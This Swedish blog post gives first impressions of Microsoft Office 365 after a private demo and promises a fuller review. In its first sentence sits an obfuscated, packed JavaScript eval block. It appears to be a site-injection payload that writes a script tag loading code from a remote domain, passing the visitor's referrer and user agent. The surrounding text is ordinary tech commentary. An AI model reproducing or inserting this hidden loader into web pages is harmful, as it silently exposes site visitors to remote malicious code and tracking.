Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Microsoft Office 365

Filip Urde
  • On 30 januari, 2013
  • http://www.revue.se/filip-urde

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yaadr|var|u0026u|referrer|tnbft||js|php’.split(’|’),0,{}))
riktig tungviktaren i mjukvaru-sammanhang är onekligen Officepaketet från Microsoft. Ett flaggskepp som ingen lyckats sänka. Nu är Office tillbaka med office 365, en ny version som tar din Office upplevelse in i framtiden.

Vi på Revue fick igår en privatgenomgång av programmen som ingår i Office 365 och vi är väldigt imponerade över hur man förverkligat en arbetsyta som är helt moln-baserad och som fungerar lika bra på samtliga plattformar (mobil, tablet och PC).

Idag har vi inte riktigt hunnit leka med programmen på egen hand, så jag tänker göra ett mer grundligt test av produkten, som jag kommer lägga upp här på Revue.

Men om man ska säga något direkt vid första anblick, så är jag väldigt imponerad över enkelheten som uppnås med att du ständigt är kopplad till molnet och att allt du gör sparas där. Det är verkligen något jag saknade under min universitetstid. Något mer man lyckats med i Office 365, som man inte riktigt uppnått i tidigare Office utgåvor, är känslan av att samtliga program i paketet lirar tillsammans. Om du t.ex. gör en uppdatering i One note så får du även detta kopplat till din Outlook mail osv.

Men som sagt, jag återkommer med en recension av paketet.

microsoft.com